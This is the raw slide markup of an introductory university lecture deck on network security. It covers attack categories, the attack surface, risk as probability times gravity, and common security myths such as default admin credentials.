              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs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76C14C-18B7-42F7-AB82-87F76295A806}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2244555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it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</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30DD24F-67AF-49E4-8BA2-032B9243D12D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>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9688F0-DA35-4367-9E64-C2C01DC0466F}"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A4CA473-E73F-4862-A06D-D0DFFEC13383}"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20DBC88-5827-470E-B866-8C28F05E9D02}"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ED6358A-A210-4419-84F1-40229C5B5526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>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C297EE8-3AB6-409E-934C-F786427231C2}"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80E16A0-964C-435B-883F-4731412F9093}"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F5F3B4D-34E9-45DB-9BDA-793CFBCCDFCE}"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F33D96-D466-4F28-AE47-01D046754C4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2438DFE-D3D9-48AF-8EDE-EB6E137EEB25}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>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8F68F90-B0AB-49D4-9A27-0622DA858A03}"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E565AF83-8D73-41B8-AB11-57AAAF6658B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hyperlink" Target="http://www.cvedetails.com/cve/CVE-2007-4509/"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we.mitre.org/data/definitions/22.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goo.gl/88zUl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5.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pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Network &amp; Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1"/>
              <a:t>introduction</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sottotitolo 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Prof. Giovambattista Ianni </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Università della Calabria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Dott. Andrea Baffa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>NTT Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A person posing for the camera&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39099DBE-7820-4436-8E1D-56EFEF40D830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165813" y="4696252"/>
            <a:ext cx="1007700" cy="1072201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="your Profile Photo, Image may contain: 1 person">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF06AF6E-4C75-4B02-8F20-BDC9F7E41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4495" y="3488060"/>
            <a:ext cx="1009018" cy="1009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Key Security Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731876" y="1295400"/>
            <a:ext cx="5832648" cy="54366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DICTIONARY - III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8229600" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>moves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attacks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>counterfeiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>theft</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Authenticity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>accountability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attacks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and strong information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>theft</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attacks to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>quality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(Distributed) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of service: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> – Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Perimeter</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>Domino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>effect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>connects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="2133600"/>
            <a:ext cx="8229600" cy="3989388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="2800" i="1" dirty="0"/>
              <a:t>The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT" sz="2800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" dirty="0"/>
              <a:t>					—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>The Art of War, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" dirty="0"/>
              <a:t>Sun Tzu</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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44" y="4408974"/>
            <a:ext cx="2467674" cy="24676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Some false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>myths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Myth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>«admin/admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> login. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Who’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> gonna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Myth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>too</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> challenge hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>mosquitoes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>purple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Myth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>«Tanto se me lo vogliono bucare me lo bucano»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to put security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>They’ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> me </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>anyway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369632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457200" y="1481328"/>
            <a:ext cx="4114800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Risk = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Probability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gravity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gravity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Involved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> people x single cost</a:t>
            </a:r>
          </a:p>
          <a:p>
